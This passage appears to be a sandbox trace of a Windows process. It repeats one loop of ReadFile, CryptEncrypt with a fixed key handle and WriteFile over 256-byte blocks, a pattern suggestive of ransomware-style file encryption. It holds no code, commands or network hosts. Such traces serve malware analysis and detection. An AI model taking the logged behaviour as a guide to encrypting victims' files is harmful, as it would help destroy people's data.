nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.111] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.111] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.111] GetLastError () returned 0x0 [0167.111] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.111] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.111] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.111] GetLastError () returned 0x0 [0167.111] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.111] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.111] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.111] GetLastError () returned 0x0 [0167.111] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.111] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.111] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.112] GetLastError () returned 0x0 [0167.112] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.112] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.112] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.112] GetLastError () returned 0x0 [0167.112] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.112] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.112] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.112] GetLastError () returned 0x0 [0167.112] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.112] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.112] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.112] GetLastError () returned 0x0 [0167.112] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.112] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.112] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.112] GetLastError () returned 0x0 [0167.112] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.112] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.112] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.112] GetLastError () returned 0x0 [0167.112] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.112] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.112] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.112] GetLastError () returned 0x0 [0167.112] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.112] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.113] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.113] GetLastError () returned 0x0 [0167.113] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.113] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.113] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.113] GetLastError () returned 0x0 [0167.113] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.113] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.113] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.113] GetLastError () returned 0x0 [0167.113] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.113] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.113] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.113] GetLastError () returned 0x0 [0167.113] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.113] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.113] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.113] GetLastError () returned 0x0 [0167.113] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.113] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.113] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.113] GetLastError () returned 0x0 [0167.113] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.113] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.113] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.113] GetLastError () returned 0x0 [0167.114] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.114] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.114] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.114] GetLastError () returned 0x0 [0167.114] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.114] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.114] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.114] GetLastError () returned 0x0 [0167.114] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.114] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.114] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.114] GetLastError () returned 0x0 [0167.114] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.114] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.114] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.114] GetLastError () returned 0x0 [0167.114] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.114] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.114] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.114] GetLastError () returned 0x0 [0167.114] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.114] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.114] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.114] GetLastError () returned 0x0 [0167.114] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.115] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.115] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.115] GetLastError () returned 0x0 [0167.115] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.115] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.115] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.115] GetLastError () returned 0x0 [0167.115] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.115] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.115] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.115] GetLastError () returned 0x0 [0167.115] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.115] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.115] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.115] GetLastError () returned 0x0 [0167.115] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.115] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.115] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.115] GetLastError () returned 0x0 [0167.115] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.115] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.115] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.115] GetLastError () returned 0x0 [0167.115] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.115] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.116] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.116] GetLastError () returned 0x0 [0167.116] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.116] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.116] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.116] GetLastError () returned 0x0 [0167.116] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.116] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.116] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.116] GetLastError () returned 0x0 [0167.116] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 